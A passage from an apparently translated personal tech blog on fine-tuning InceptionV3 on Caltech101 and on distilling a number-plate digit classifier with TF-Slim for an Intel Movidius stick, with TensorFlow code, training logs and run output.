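The Movidius script turns each output vector into a class index with `np.argmax` and looks the name up in `categories.txt`, the file that `loadimg` writes with one class per line. Below is a small sketch of that lookup, with made-up category names and scores. Note that splitting the file contents on `'\n'` leaves a trailing empty entry, which `splitlines()` avoids.

```python
def load_categories(text):
    """Return the non-empty lines of a categories file."""
    return [line for line in text.splitlines() if line]

def top_category(scores, categories):
    """Return the category name with the highest score."""
    best = max(range(len(scores)), key=lambda i: scores[i])
    return categories[best]

file_text = "airplanes\nchair\npanda\n"   # hypothetical categories.txt contents
categories = load_categories(file_text)
predicted = top_category([0.1, 0.7, 0.2], categories)
```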

2018-09-22

Fine-Tuning InceptionV3

Fine-tune an InceptionV3 pretrained on ImageNet to Caltech101.

Fine-tuning by following the tutorial

Reference: http://ronny.rest/blog/post_2017_10_13_tf_transfer_learning/

Let's try it.

As usual, the pretrained Inception V3 model comes from https://github.com/tensorflow/models/tree/master/research/slim ; I picked http://download.tensorflow.org/models/inception_v3_2016_08_28.tar.gz

Input and output

Input: Caltech101
Output: 101 classes
Batch size: 32
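
With a batch size of 32, the training loop takes `len(X_train) // batch_size` steps per epoch, so any samples left over after the last full batch are skipped. The sketch below shows the arithmetic. The sample count 6941 is an assumption chosen to be consistent with the 216 training steps shown in the log, not a number taken from the post.

```python
def steps_per_epoch(num_samples, batch_size):
    """Number of full batches; the remainder is dropped."""
    return num_samples // batch_size

def batch_bounds(step, batch_size):
    """Slice bounds used as X_train[start:stop] for a given step."""
    return batch_size * step, batch_size * (step + 1)

num_train = 6941   # hypothetical training-set size
batch_size = 32
steps = steps_per_epoch(num_train, batch_size)
skipped = num_train - steps * batch_size
last_start, last_stop = batch_bounds(steps - 1, batch_size)
```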

Results

It worked.

Initializing from Pretrained Weights
INFO:tensorflow:Restoring parameters from ./models/inception_v3.ckpt
----------------------------------------------
EPOCH 1/20 

100%|██████████| 216/216 [01:45<00:00,  2.41it/s]
100%|██████████| 54/54 [00:07<00:00,  8.15it/s]

    step:   53  loss: 0.3671 val accuracy: 0.8681
----------------------------------------------
EPOCH 2/20 

100%|██████████| 216/216 [01:29<00:00,  2.41it/s]
100%|██████████| 54/54 [00:06<00:00,  8.13it/s]

    step:   53  loss: 0.2679 val accuracy: 0.9236


----------------------------------------------
EPOCH 19/20 

100%|██████████| 216/216 [01:31<00:00,  2.34it/s]
100%|██████████| 54/54 [00:06<00:00,  7.97it/s]

    step:   53  loss: 0.2040 val accuracy: 0.9659
----------------------------------------------
EPOCH 20/20 

100%|██████████| 216/216 [01:31<00:00,  2.37it/s]
100%|██████████| 54/54 [00:06<00:00,  8.05it/s]

    step:   53  loss: 0.2002 val accuracy: 0.9653

Source code

The tutorial's code, modified for number-plate use

#!/usr/bin/env python
# coding: utf-8

# In[1]:


import os,time
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" 
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
import tensorflow as tf
import numpy as np
import tensorflow.contrib.slim as slim
import tensorflow.contrib.slim.nets
#from __future__ import print_function, division
import loadimg
from tqdm import tqdm
import matplotlib.pyplot as plt

start = time.time()


# In[2]:


np_aryname = './models/data{0}.npy'
SAVE = False

if SAVE:
    X_train, Y_train, X_test, Y_test, number_of_classes = loadimg.loadimg(
        '/home/tokunn/caltech101')

    np.save(np_aryname.format('X_train'), X_train)
    np.save(np_aryname.format('Y_train'), Y_train)
    np.save(np_aryname.format('X_test'), X_test)
    np.save(np_aryname.format('Y_test'), Y_test)
    np.save(np_aryname.format('number_of_classes'), number_of_classes)
    
else: # LOAD
    X_train = np.load(np_aryname.format('X_train'))
    Y_train = np.load(np_aryname.format('Y_train'))
    X_test = np.load(np_aryname.format('X_test'))
    Y_test = np.load(np_aryname.format('Y_test'))
    number_of_classes = int(np.load(np_aryname.format('number_of_classes')))  # np.load returns a 0-d array

print("X_train", X_train.shape)
print("Y_train", Y_train.shape)
print("X_test", X_test.shape)
print("Y_test", Y_test.shape)
print("Number of Classes", number_of_classes)


# In[3]:


SNAPSHOT_FILE = "./models/snapshot.ckpt"
PRETRAINED_SNAPSHOT_FILE = "./models/inception_v3.ckpt"

# somewhere to store the tensorboard files - to visualise the graph
TENSORBOARD_DIR = "logs"

# IMAGE SETTINGS
IMG_WIDTH, IMG_HEIGHT = [299,299] # Dimensions required by inception V3
N_CHANNELS = 3                    # Number of channels required by inception V3
N_CLASSES = number_of_classes                    # Change N_CLASSES to suit your needs


# In[4]:


graph = tf.Graph()
with graph.as_default():
    # INPUTS
    with tf.name_scope("inputs") as scope:
        input_dims = (None, IMG_HEIGHT, IMG_WIDTH, N_CHANNELS)
        tf_X = tf.placeholder(tf.float32, shape=input_dims, name="X")
        tf_Y = tf.placeholder(tf.int32, shape=[None], name="Y")
        tf_alpha = tf.placeholder_with_default(0.001, shape=None, name="alpha")
        tf_is_training = tf.placeholder_with_default(False, shape=None, name="is_training")

    # PREPROCESSING STEPS
    with tf.name_scope("preprocess") as scope:
        scaled_inputs = tf.div(tf_X, 255., name="rescaled_inputs")

    # BODY
    arg_scope = tf.contrib.slim.nets.inception.inception_v3_arg_scope()
    with tf.contrib.framework.arg_scope(arg_scope):
        tf_logits, end_points = tf.contrib.slim.nets.inception.inception_v3(
            scaled_inputs,
            num_classes=N_CLASSES,
            is_training=tf_is_training,
            dropout_keep_prob=0.8)

    # PREDICTIONS
    tf_preds = tf.to_int32(tf.argmax(tf_logits, axis=-1), name="preds")

    # LOSS - Sums all losses (even Regularization losses)
    with tf.variable_scope('loss') as scope:
        unrolled_labels = tf.reshape(tf_Y, (-1,))
        tf.losses.sparse_softmax_cross_entropy(labels=unrolled_labels,
                                               logits=tf_logits)
        tf_loss = tf.losses.get_total_loss()

    # OPTIMIZATION - Also updates batchnorm operations automatically
    with tf.variable_scope('opt') as scope:
        tf_optimizer = tf.train.AdamOptimizer(tf_alpha, name="optimizer")
        update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) # for batchnorm
        with tf.control_dependencies(update_ops):
            tf_train_op = tf_optimizer.minimize(tf_loss, name="train_op")
            
    # Evaluation
    with tf.variable_scope('eval') as scope:
        y = tf.nn.softmax(tf_logits, name='softmax')
        accuracy = tf.reduce_mean(
            tf.cast(tf.equal(tf.argmax(y, 1), tf.cast(tf_Y, tf.int64)), tf.float32)
        )

    # PRETRAINED SAVER SETTINGS
    # Lists of scopes of weights to include/exclude from pretrained snapshot
    pretrained_include = ["InceptionV3"]
    pretrained_exclude = ["InceptionV3/AuxLogits", "InceptionV3/Logits"]

    # PRETRAINED SAVER - For loading pretrained weights on the first run
    pretrained_vars = tf.contrib.framework.get_variables_to_restore(
        include=pretrained_include,
        exclude=pretrained_exclude)
    tf_pretrained_saver = tf.train.Saver(pretrained_vars, name="pretrained_saver")

    # MAIN SAVER - For saving/restoring your complete model
    tf_saver = tf.train.Saver(name="saver")

    # TENSORBOARD - To visualize the architecture
    with tf.variable_scope('tensorboard') as scope:
        tf_summary_writer = tf.summary.FileWriter(TENSORBOARD_DIR, graph=graph)
        tf_dummy_summary = tf.summary.scalar(name="dummy", tensor=1)


# In[5]:


def initialize_vars(session):
    # INITIALIZE VARS
    if False: #tf.train.checkpoint_exists(SNAPSHOT_FILE):
        print(" Loading from Main Checkpoint")
        tf_saver.restore(session, SNAPSHOT_FILE)
    else:
        print("Initializing from Pretrained Weights")
        session.run(tf.global_variables_initializer())
        tf_pretrained_saver.restore(session, PRETRAINED_SNAPSHOT_FILE)


# In[ ]:


with tf.Session(graph=graph) as sess:
    n_epochs = 20
    print_every = 32
    batch_size = 32 # small batch size so inception v3 can be run on laptops
    steps_per_epoch = len(X_train)//batch_size
    steps_per_epoch_val = len(X_test)//batch_size

    initialize_vars(session=sess)

    for epoch in range(n_epochs):
        print("----------------------------------------------", flush=True)
        print("EPOCH {}/{}".format(epoch+1, n_epochs), flush=True, end=' ')
        #print("----------------------------------------------", flush=True)
        for step in tqdm(range(steps_per_epoch)):
            # EXTRACT A BATCH OF TRAINING DATA
            X_batch = X_train[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_train[batch_size*step: batch_size*(step+1)]

            # RUN ONE TRAINING STEP - feeding batch of data
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         tf_alpha:0.0001,
                         tf_is_training: True}
            loss, _ = sess.run([tf_loss, tf_train_op], feed_dict=feed_dict)
            
        val_accuracy = []
        for step in tqdm(range(steps_per_epoch_val)):
            # EXTRACT A BATCH OF TEST DATA
            X_batch = X_test[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_test[batch_size*step: batch_size*(step+1)]
            
            # Evaluation
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         tf_alpha:0.0001,
                         tf_is_training: False}            
            val_accuracy.append(accuracy.eval(feed_dict=feed_dict))
            
        # PRINT FEEDBACK - once per epoch
        total_val_accuracy = np.average(np.asarray(val_accuracy))
        print("\tstep: {: 4d}  loss: {:0.4f} val accuracy: {:0.4f}".format(
                    step, loss, total_val_accuracy))
        plt.plot(sess.run(tf_logits, feed_dict = {
            tf_X: [X_test[0]],
            tf_Y: [Y_test[0]],
            tf_is_training: False
        })[0])
        # SAVE SNAPSHOT - after each epoch
        tf_saver.save(sess, SNAPSHOT_FILE)


# In[ ]:


end = time.time()
print("Time : {0}".format(end-start))


# In[ ]:


plt.show()

2018-09-22

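Running a model written with TensorFlow Slim (TF-Slim) on Movidius & pseudo-distillation

What is TF-Slim

Roughly a set of macros over TensorFlow's low-level API. It makes models relatively easy to write.

Defining variables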

weights = slim.model_variable('weights', shape=[10, 10, 3 , 3])
my_var = slim.variable('my_var',
                       shape=[20, 1],
                       initializer=tf.zeros_initializer())

Adding layers

net = slim.conv2d(input, 128, [3, 3], scope='conv1_1')
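
In this call, 128 is the number of output channels and `[3, 3]` is the kernel size. `slim.conv2d` defaults to a stride of 1 and `'SAME'` padding, so the spatial size is preserved. The helper below is an illustrative sketch (not part of TF-Slim) of the standard output-size formulas for the two padding modes.

```python
import math

def conv_output_size(input_size, kernel_size, stride=1, padding="SAME"):
    """Spatial output size of a convolution along one dimension."""
    if padding == "SAME":
        return math.ceil(input_size / stride)
    if padding == "VALID":
        return math.ceil((input_size - kernel_size + 1) / stride)
    raise ValueError("padding must be 'SAME' or 'VALID'")

same = conv_output_size(224, 3)                    # 224
valid = conv_output_size(224, 3, padding="VALID")  # 222
strided = conv_output_size(224, 3, stride=2)       # 112
```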

Layer	TF-Slim
BiasAdd	slim.bias_add
BatchNorm	slim.batch_norm
Conv2d	slim.conv2d
Conv2dInPlane	slim.conv2d_in_plane
Conv2dTranspose (Deconv)	slim.conv2d_transpose
FullyConnected	slim.fully_connected
AvgPool2D	slim.avg_pool2d
Dropout	slim.dropout
Flatten	slim.flatten
MaxPool2D	slim.max_pool2d
OneHotEncoding	slim.one_hot_encoding
SeparableConv2	slim.separable_conv2d
UnitNorm	slim.unit_norm

Sample

import numpy as np
import tensorflow as tf

from tensorflow.contrib.slim.nets import inception

slim = tf.contrib.slim

def run(name, image_size, num_classes):
    with tf.Graph().as_default():
        image = tf.placeholder("float", [1, image_size, image_size, 3], name="input")
        with slim.arg_scope(inception.inception_v1_arg_scope()):
            logits, _ = inception.inception_v1(image, num_classes, is_training=False, spatial_squeeze=False)
        probabilities = tf.nn.softmax(logits)
        init_fn = slim.assign_from_checkpoint_fn('inception_v1.ckpt', slim.get_model_variables('InceptionV1'))

        with tf.Session() as sess:
            init_fn(sess)
            saver = tf.train.Saver(tf.global_variables())
            saver.save(sess, "output/"+name)

run('inception-v1', 224, 1001)

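Distillation with TF-Slim

I stitched together source code I found and forced it to run; it only barely works.

Distilling into a fully-connected-only network using license plate images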
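The student loss in the training script further down adds two cross-entropy terms: one against the one-hot labels, and one against the teacher's softened output at a given temperature. The following is a minimal sketch of that idea in plain Python, not the script itself. The logits and the 3-class setup are made up for illustration, and the function names are my own.

```python
import math

def softmax(logits, temperature=1.0):
    """Softmax over a list of logits, softened by dividing by temperature."""
    scaled = [z / temperature for z in logits]
    peak = max(scaled)  # subtract the max for numerical stability
    exps = [math.exp(z - peak) for z in scaled]
    total = sum(exps)
    return [e / total for e in exps]

def cross_entropy(target, prediction, floor=1e-10):
    """-sum(target * log(prediction)), clipping predictions to [floor, 1.0]."""
    return -sum(t * math.log(min(max(p, floor), 1.0))
                for t, p in zip(target, prediction))

def student_loss(student_logits, teacher_probs, one_hot_label, temperature=1.0):
    """Hard-label term plus soft-target term, summed with equal weight."""
    hard = cross_entropy(one_hot_label, softmax(student_logits))
    soft = cross_entropy(teacher_probs, softmax(student_logits, temperature))
    return hard + soft

# Made-up values for a 3-class problem (illustration only)
teacher_logits = [4.0, 1.0, 0.5]
student_logits = [2.0, 1.5, 0.1]
label = [1.0, 0.0, 0.0]

for T in (1.0, 4.0):
    teacher_probs = softmax(teacher_logits, T)
    loss_value = student_loss(student_logits, teacher_probs, label, T)
    print(T, [round(p, 3) for p in teacher_probs], round(loss_value, 4))
```

A higher temperature flattens the teacher distribution, so the student also sees the relative probabilities of the wrong classes. With temperature = 1, as set in the script, the soft and hard terms use the same student softmax.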

Converting the distilled model for Movidius

Check the output node in the graph

fw = tf.summary.FileWriter('logs', sess.graph)
fw.close()

tensorboard --logdir logs

Compile

mvNCCompile -s 12 student_flozen.ckpt.meta -in=input -on=output -o graph

Run

tokunn@nanase 1:18:01 [~/Documents/distil_mnist/second_challenge] $ python3 movidius.py /home/tokunn/make_image/test/3186 2>/dev/null
Image path : /home/tokunn/make_image/test/3186/*.jpg or *.png
['extend_5_0_5934.png', 'extend_9_0_1460.png', 'extend_9_0_6437.png', 'extend_9_0_733.png', 'extend_13_0_8860.png', 'extend_5_0_1296.png', 'extend_5_0_320.png', 'extend_5_0_2227.png', 'extend_5_0_6957.png', 'extend_1_0_2447.png']
imgshape  (25, 784)
Start prediting ...
1 7 7 7 6 7 7 7 7 8 1 7 7 7 7 7 7 2 2 7 7 3 9 1 2 
Time : 0.10333132743835449 (25 images)

It ran more smoothly than I expected.
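The timing line in the log can be turned into a per-image latency and a throughput figure. This is plain arithmetic on the two numbers printed above. Judging from the prediction script further down, the timer wraps only the LoadTensor/GetResult loop, so device open and graph allocation are not included.

```python
elapsed_s = 0.10333132743835449  # "Time" value from the log above
num_images = 25                   # "(25 images)" from the same line

per_image_ms = elapsed_s / num_images * 1000.0
images_per_s = num_images / elapsed_s

print("{:.2f} ms per image, {:.0f} images/s".format(per_image_ms, images_per_s))
```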

Source code

Number plates: parent and child (teacher and student networks)

#!/usr/bin/env python
# coding: utf-8

# In[1]:


import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" 
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
import tensorflow as tf
import numpy as np
import tensorflow.contrib.slim as slim
from tensorflow.examples.tutorials.mnist import input_data
import loadimg


# In[2]:


#config = tf.ConfigProto()
#config.gpu_options.per_process_gpu_memory_fraction = 0.25
#sess = tf.Session(config=config)

config = tf.ConfigProto(
    gpu_options=tf.GPUOptions(
        visible_device_list="1", # specify GPU number
        allow_growth=False
    )
)
#sess = tf.Session(config=config)


# In[3]:


NUMBER_OF_CLASS = 10


# In[4]:


def MnistNetworkTeacher(input,keep_prob_conv,keep_prob_hidden,scope='Mnist',reuse = False):
    with tf.variable_scope(scope,reuse = reuse) as sc :
        with slim.arg_scope([slim.conv2d],
                            kernel_size = [3,3],
                            stride = [1,1],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.relu):
                                        
                                        
            net = slim.conv2d(input, 32, scope='conv1')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool1')
            net = tf.nn.dropout(net, keep_prob_conv)

            net = slim.conv2d(net, 64,scope='conv2')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool2')
            net = tf.nn.dropout(net, keep_prob_conv)

            net = slim.conv2d(net, 128,scope='conv3')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool3')
            net = tf.nn.dropout(net, keep_prob_conv)

            net = slim.flatten(net)
        with slim.arg_scope([slim.fully_connected],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.relu) :
            
            net = slim.fully_connected(net,625,scope='fc1')
            net = tf.nn.dropout(net, keep_prob_hidden)
            net = slim.fully_connected(net,NUMBER_OF_CLASS,activation_fn=None,scope='fc2')
            
            net = tf.nn.softmax(net/temperature)
            return net


# In[5]:


def MnistNetworkStudent(input,scope='Mnist',reuse = False):
    with tf.variable_scope(scope,reuse = reuse) as sc :
        with slim.arg_scope([slim.fully_connected],
                                          biases_initializer=tf.constant_initializer(0.0),
                                          activation_fn=tf.nn.sigmoid):
            
            net = slim.fully_connected(input,1000,scope = 'fc1')
            net = slim.fully_connected(net,
                                       NUMBER_OF_CLASS,
                                       activation_fn = None,
                                       scope = 'fc2')
            
            return net


# In[6]:


def loss(prediction,output,temperature = 1):
    cross_entropy = tf.reduce_mean(-tf.reduce_sum(
        output * tf.log(tf.clip_by_value(prediction,1e-10,1.0)),
                                                  reduction_indices=[1]))      
    correct_prediction = tf.equal(tf.argmax(prediction,1), tf.argmax(output,1))
    accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
    return cross_entropy,accuracy


# In[7]:


eps = 0.1
alpha = 0.5
temperature = 1
start_lr = 1e-4
decay = 1e-6


# In[8]:


with tf.Graph().as_default():
        
    
     

    x = tf.placeholder(tf.float32, shape=[None, 784], name='input')
    y_ = tf.placeholder(tf.float32, shape=[None, NUMBER_OF_CLASS])
    keep_prob_conv = tf.placeholder(tf.float32)
    keep_prob_hidden = tf.placeholder(tf.float32)
    x_image = tf.reshape(x, [-1,28,28,1])

    y_conv_teacher=MnistNetworkTeacher(x_image,keep_prob_conv,
                                       keep_prob_hidden,scope = 'teacher')
    y_conv = MnistNetworkStudent(x,scope = 'student')

    y_conv_student = tf.nn.softmax(y_conv/temperature)
    y_conv_student_actual = tf.nn.softmax(y_conv)

    cross_entropy_teacher, accuracy_teacher=loss(y_conv_teacher,
                                                 y_,
                                                temperature = temperature)
    student_loss1, accuracy_student = loss(y_conv_student_actual,
                                           y_,
                                          temperature = temperature)
    
    student_loss2 = tf.reduce_mean(
        - tf.reduce_sum(y_conv_teacher * tf.log(tf.clip_by_value(y_conv_student, 1e-10,1.0)), reduction_indices=1)
    )
    cross_entropy_student = student_loss1 + student_loss2
    
    model_vars = tf.trainable_variables()
    var_teacher = [var for var in model_vars if 'teacher' in var.name]
    var_student = [var for var in model_vars if 'student' in var.name]

    grad_teacher = tf.gradients(cross_entropy_teacher,var_teacher)
    grad_student = tf.gradients(cross_entropy_student,var_student)

    l_rate = tf.placeholder(shape=[],dtype = tf.float32)
    
    trainer = tf.train.RMSPropOptimizer(learning_rate = l_rate)
    trainer1 = tf.train.GradientDescentOptimizer(0.1)

    train_step_teacher = trainer.apply_gradients(zip(grad_teacher,var_teacher))
    train_step_student = trainer1.apply_gradients(zip(grad_student,var_student))

    sess = tf.InteractiveSession(config=config)
    sess.run(tf.global_variables_initializer())
    saver1 = tf.train.Saver(var_teacher)
    saver2 = tf.train.Saver(var_student)
    


# In[9]:


#mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)  

x_train, y_train, x_test, y_test, class_count = loadimg.loadimg(
    '/home/tokunn/make_image/',
    NUMBER_OF_CLASS
)


# In[10]:


for i in range(10000):
  #batch = mnist.train.next_batch(128)
  s = 128*i % len(x_train)
  batch = [x_train[s:s+128], y_train[s:s+128]]
  lr = start_lr * 1.0/(1.0 + i*decay)
  if i%100 ==0:
    train_accuracy = accuracy_teacher.eval(feed_dict={x:x_test,
                                                      y_: y_test,
                                                      keep_prob_conv: 1.0,
                                                      keep_prob_hidden: 1.0})
    print("step %d, training accuracy %g,"%(i, train_accuracy))
  train_step_teacher.run(feed_dict={x: batch[0],
                                    y_: batch[1],
                                    keep_prob_conv :0.8,
                                    #keep_prob_hidden:0.5})
                                    keep_prob_hidden:0.5,
                                    l_rate:lr})

saver1.save(sess,'./models/teacher1.ckpt')
print('*'*20)


 
for i in range(30000):
  #batch = mnist.train.next_batch(100)
  s = 128*i % len(x_train)
  batch = [x_train[s:s+100], y_train[s:s+100]]
  if i%100 == 0:
    train_accuracy = accuracy_student.eval(feed_dict={x:x_test,
                                                      y_: y_test,
                                                      keep_prob_conv: 1.0,
                                                      keep_prob_hidden: 1.0})
    print("step %d, training accuracy %g"%(i, train_accuracy))
  train_step_student.run(feed_dict={x: batch[0],
                                    y_: batch[1],
                                    keep_prob_conv :1.0,
                                    keep_prob_hidden:1.0})

  
saver2.save(sess,'./models/student.ckpt')  



# In[11]:


test_acc = sess.run(accuracy_student,feed_dict={x: x_test,
                                                y_: y_test,
                                                keep_prob_conv: 1.0,
                                                keep_prob_hidden: 1.0})
print("test accuracy of the student model is %g "%(test_acc))


# In[13]:


fw = tf.summary.FileWriter('logs', sess.graph)
fw.close()


# In[ ]:
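The teacher loop above computes its learning rate as start_lr / (1 + i * decay). A small sketch with the same constants shows how little the rate moves over the 10000 teacher steps. The function name is my own.

```python
start_lr = 1e-4   # values from the hyperparameter cell above
decay = 1e-6

def learning_rate(step):
    """Inverse-time decay, as computed inside the teacher loop."""
    return start_lr * 1.0 / (1.0 + step * decay)

for step in (0, 5000, 9999):
    print(step, learning_rate(step))
```

With decay = 1e-6 the rate drops by only about 1% by the last step, so the schedule is close to a constant 1e-4. The student loop does not use this schedule at all; it runs GradientDescentOptimizer with a fixed 0.1.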

loadimg

#!/usr/bin/env python2

import os
import numpy as np
import tensorflow as tf
from keras.preprocessing.image import load_img, img_to_array
from keras.utils import np_utils
import matplotlib.pyplot as plt
import glob
from sklearn.model_selection import train_test_split


IMGSIZE = 28

def loadimg_one(DIRPATH, NUM):
    x = []
    y = []

    img_list = os.listdir(DIRPATH)
    if (NUM) and (len(img_list) > NUM):
        img_list = img_list[:NUM]
    #print("[loadimg] : img_list : ", end=' ')
    #print(img_list)

    img_count = 0

    for number in img_list:
        dirpath = os.path.join(DIRPATH, number)
        dirpic_list = glob.glob(os.path.join(dirpath, '*.jpg'))
        dirpic_list += glob.glob(os.path.join(dirpath, '*.png'))
        for picture in dirpic_list:
            img = img_to_array(load_img(picture, color_mode = "grayscale", target_size=(IMGSIZE, IMGSIZE)))
            x.append(img)
            y.append(img_count)
            #print("Load {0} : {1}".format(picture, img_count))
        img_count += 1

    output_count = img_count
    x = np.asarray(x)
    x = x.astype('float32')
    x = x/255.0
    y = np.asarray(y, dtype=np.int32)
    y = np_utils.to_categorical(y, output_count)

    return x, y, output_count


def loadimg(COMMONDIR='./', NUM=None):
    print("########## loadimg ########")

    #COMMONDIR = './make_image'
    TRAINDIR = os.path.join(COMMONDIR, 'train')
    TESTDIR = os.path.join(COMMONDIR, 'test')
    x_train, y_train, class_count = loadimg_one(TRAINDIR, NUM)
    x_test,  y_test,  _  = loadimg_one(TESTDIR, NUM)
    #for i in range(0, x_test.shape[0]):
    #    plt.imshow(x_test[i])
    #    plt.show()
    x = np.concatenate((x_train, x_test))
    x = np.reshape(x, [-1, 784])
    y = np.concatenate((y_train, y_test)) 

    print("x_train, y_train, x_test, y_test, class_count")
    print("x_train shape : ", x_train.shape)

    print("########## END of loadimg ########")
    x_train, x_test, y_train, y_test = train_test_split(x, y,train_size=0.2, test_size=0.8)
    return x_train,  y_train, x_test, y_test, class_count

if __name__ == '__main__':
    loadimg()
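loadimg_one above gives every class directory an integer index in listing order and then one-hot encodes it with np_utils.to_categorical. The encoding step can be sketched without Keras as follows. The helper name and the example labels are hypothetical.

```python
def to_one_hot(labels, num_classes):
    """Turn integer class indices into rows with a single 1.0 per row."""
    rows = []
    for label in labels:
        row = [0.0] * num_classes
        row[label] = 1.0
        rows.append(row)
    return rows

# Hypothetical example: three class directories, two images in the first one
class_index_per_image = [0, 0, 1, 2]
one_hot = to_one_hot(class_index_per_image, num_classes=3)
for row in one_hot:
    print(row)
```

One thing to keep in mind: os.listdir returns entries in arbitrary order, so the index given to a directory is not guaranteed to match between the train and test folders unless the listing is sorted first.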

Code conversion

#!/usr/bin/env python
# coding: utf-8

# In[1]:


import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
import tensorflow as tf
import numpy as np
import tensorflow.contrib.slim as slim
from tensorflow.examples.tutorials.mnist import input_data
import loadimg


# In[2]:


NUMBER_OF_CLASS = 10


# In[3]:


def MnistNetworkStudent(input,scope='Mnist',reuse = False):
    with tf.variable_scope(scope,reuse = reuse) as sc :
        with slim.arg_scope([slim.fully_connected],
                                          biases_initializer=tf.constant_initializer(0.0),
                                          activation_fn=tf.nn.sigmoid):
            
            net = slim.fully_connected(input,1000,scope = 'fc1')
            net = slim.fully_connected(net,
                                       NUMBER_OF_CLASS,
                                       activation_fn = None,
                                       scope = 'fc2')
            
            return net


# In[4]:


eps = 0.1
alpha = 0.5
temperature = 1
start_lr = 1e-4
decay = 1e-6


# In[5]:


with tf.Graph().as_default():
    
    x = tf.placeholder(tf.float32, shape=[None, 784], name='input')
    x_image = tf.reshape(x, [-1,28,28,1])

    y_conv = MnistNetworkStudent(x,scope = 'student')

    y_conv_student = tf.nn.softmax(y_conv/temperature, name='output_temp')
    y_conv_student_actual = tf.nn.softmax(y_conv, name='output')

    model_vars = tf.trainable_variables()
    var_student = [var for var in model_vars if 'student' in var.name]

    sess = tf.InteractiveSession()
    sess.run(tf.global_variables_initializer())
    sess.run(tf.local_variables_initializer())
    saver2 = tf.train.Saver(var_student)
    


# In[6]:


saver2.restore(sess, './models/student.ckpt')
saver2.save(sess,'./models/student_flozen.ckpt')  


# In[7]:


fw = tf.summary.FileWriter('logs', sess.graph)
fw.close()

Movidius prediction

import mvnc.mvncapi as mvnc
import numpy as np
from PIL import Image
import cv2
import time, sys, os

import glob

IMAGE_DIR_NAME = '/home/tokunn/make_image/'
if (len(sys.argv) > 1):
    IMAGE_DIR_NAME = sys.argv[1]
#IMAGE_DIR_NAME = 'github_deep_mnist/ncappzoo/data/digit_images'

def predict(input):
    print("Start prediting ...")
    devices = mvnc.EnumerateDevices()
    device = mvnc.Device(devices[0])
    device.OpenDevice()

    # Load graph file data
    with open('./models/graph', 'rb') as f:
        graph_file_buffer = f.read()

    # Initialize a Graph object
    graph = device.AllocateGraph(graph_file_buffer)

    start = time.time()
    for i in range(len(input)):
        # Write the tensor to the input_fifo and queue an inference
        graph.LoadTensor(input[i], None)
        output, userobj = graph.GetResult()
        print(np.argmax(output), end=' ')
    stop = time.time()
    print('')
    print("Time : {0} ({1} images)".format(stop-start, len(input)))

    graph.DeallocateGraph()
    device.CloseDevice()

    return output

if __name__ == '__main__':
    print("Image path : {0}".format(os.path.join(IMAGE_DIR_NAME, '*.jpg or *.png')))
    jpg_list = glob.glob(os.path.join(IMAGE_DIR_NAME, '*.jpg'))
    jpg_list += glob.glob(os.path.join(IMAGE_DIR_NAME, '*.png'))
    if not len(jpg_list):
        print("No image file")
        sys.exit()
    jpg_list.reverse()
    print([i.split('/')[-1] for i in jpg_list][:10])
    img_list = []
    for n in jpg_list:
        image = cv2.imread(n)
        image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
        image = cv2.resize(image, (28, 28))
        img_list.append(image)
    img_list = np.asarray(img_list) * (1.0/255.0)
    img_list = np.reshape(img_list, [-1, 784])
    print("imgshape ", img_list.shape)
    predict(img_list.astype(np.float16))
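The script above scales pixels by 1/255, flattens each image to 784 values and casts to float16 before sending it to the stick. The sketch below mimics those steps with the standard library only, to show how much precision the half-precision cast costs. The 2x2 "image" is a made-up stand-in for the 28x28 input, and the helper names are my own.

```python
import struct

def to_float16(value):
    """Round a Python float to the nearest IEEE 754 half-precision value."""
    return struct.unpack('<e', struct.pack('<e', value))[0]

def preprocess(gray_rows):
    """Flatten a 2-D grid of 0..255 pixels, scale to [0, 1], round to float16."""
    flat = [pixel for row in gray_rows for pixel in row]
    return [to_float16(pixel * (1.0 / 255.0)) for pixel in flat]

# Hypothetical 2x2 grayscale image (illustration only)
tiny = [[0, 64], [128, 255]]
values = preprocess(tiny)

# Largest difference between the float16 value and the exact pixel / 255
worst = max(abs(v - p / 255.0) for v, p in zip(values, [0, 64, 128, 255]))
print(values, worst)
```

For inputs in [0, 1] the rounding error stays well below 1e-3, which is small next to the 1/255 step between neighbouring pixel levels.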

Source code 2

Taking input as [None, 28, 28, 3]

#!/usr/bin/env python
# coding: utf-8

# In[1]:


import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" 
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
import tensorflow as tf
import numpy as np
import tensorflow.contrib.slim as slim
from tensorflow.examples.tutorials.mnist import input_data
import loadimg


# In[2]:


NUMBER_OF_CLASS = 10


# In[3]:


def MnistNetworkTeacher(input,keep_prob_conv,keep_prob_hidden,scope='Mnist',reuse = False):
    with tf.variable_scope(scope,reuse = reuse) as sc :
        with slim.arg_scope([slim.conv2d],
                            kernel_size = [3,3],
                            stride = [1,1],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.relu):
                                        
                                        
            net = slim.conv2d(input, 32, scope='conv1')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool1')
            net = tf.nn.dropout(net, keep_prob_conv)

            net = slim.conv2d(net, 64,scope='conv2')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool2')
            net = tf.nn.dropout(net, keep_prob_conv)

            net = slim.conv2d(net, 128,scope='conv3')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool3')
            net = tf.nn.dropout(net, keep_prob_conv)

            net = slim.flatten(net)
        with slim.arg_scope([slim.fully_connected],
                            biases_initializer=tf.constant_initializer(0.0),
